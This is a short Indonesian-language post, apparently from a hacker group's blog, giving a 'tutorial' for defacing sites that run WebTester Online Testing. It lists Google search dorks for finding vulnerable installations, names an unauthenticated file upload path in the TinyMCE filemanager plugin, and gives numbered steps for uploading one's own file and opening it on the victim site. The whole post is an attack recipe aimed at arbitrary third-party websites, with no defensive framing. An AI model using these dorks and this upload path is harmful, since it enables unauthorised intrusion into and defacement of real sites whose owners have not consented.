www.squadcyber.org - Masih bersama ane guys, kali ini wa kasih turtor pepes metode WebTester Vulnerability. Langsung sadja ea :v
Bahan" :
Dork :
intext:Copyright © 2003 - 2010 Eppler Software
intitle:WebTester Online Testing
inurl:/webtester5/
(kembangin lageh :v)
Exploit : www.site.co.li/[path]/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
STEP" :
1. Dorking pakek dork diatas :v
2. Kalo udah dapet target, masukin exploit nya /tiny_mce/plugins/filemanager/InsertFile/insert_file.php Kalau sudah tinggal browse file kalean lalu klik upload. Kalau sukses, kalian bisa liat ada nama file kalian di list
3. Akses? www.site.co.li/[path]/test-images/scriptkalean.html
Sekian dari ane :v
Maap kalo ada salah/kurang jelas
Thanks :*
Comments
Post a Comment